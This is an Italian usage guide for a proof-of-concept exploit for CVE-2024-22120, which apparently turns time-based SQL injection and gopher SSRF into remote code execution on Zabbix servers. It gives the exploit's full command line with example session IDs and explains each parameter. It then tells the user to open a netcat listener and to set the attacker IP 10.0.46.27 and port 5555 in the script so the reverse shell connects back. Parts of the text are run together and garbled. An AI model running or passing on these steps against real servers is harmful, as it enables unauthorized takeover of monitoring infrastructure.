
Proof-of-concept exploit per CVE-2024-22120 che sfrutta l'SQL injection basata sul tempo e la SSRF basata su gopher per ottenere l'esecuzione remota di codice su server Zabbix vulnerabili, a scopo di ricerca sulla sicurezza educativa.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Hai identificato un server Zabbix in esecuzione sull'IP 192.168.1.100 e hai accesso a un utente con privilegi limitati con i seguenti dettagli:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gVuoi sfruttare la vulnerabilità RCE usando questo script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: L'indirizzo IP del server Zabbix.--sid d82bf6715e1d3c1f25: L'ID di sessione di un utente con privilegi limitati.--hostid 10107: L'ID di un host a cui l'utente con privilegi limitati può accedere.--phpsessid a4g7f48d9j3r7h8s9g: L'ID di sessione PHP utilizzato per autenticare le richieste.--false_time 1: Tempo in secondi di attesa in caso di risposta errata durante l'iniezione SQL (predefinito: 1 secondo).--true_time 3: Tempo in secondi di attesa in caso di risposta corretta durante l'iniezione SQL (predefinito: 3 secondi).10.0.46.27:5555 nello script).Assicurati che la tua macchina sia in ascolto sulla porta specificata (5555 nello script) per ricevere la reverse shell. Puoi usare netcat per questo:
nc -lvnp 5555
Sostituisci l'IP 10.0.46.27 e la porta 5555 nella funzione CreateScript con il tuo IP e la porta desiderata per ricevere la reverse shell.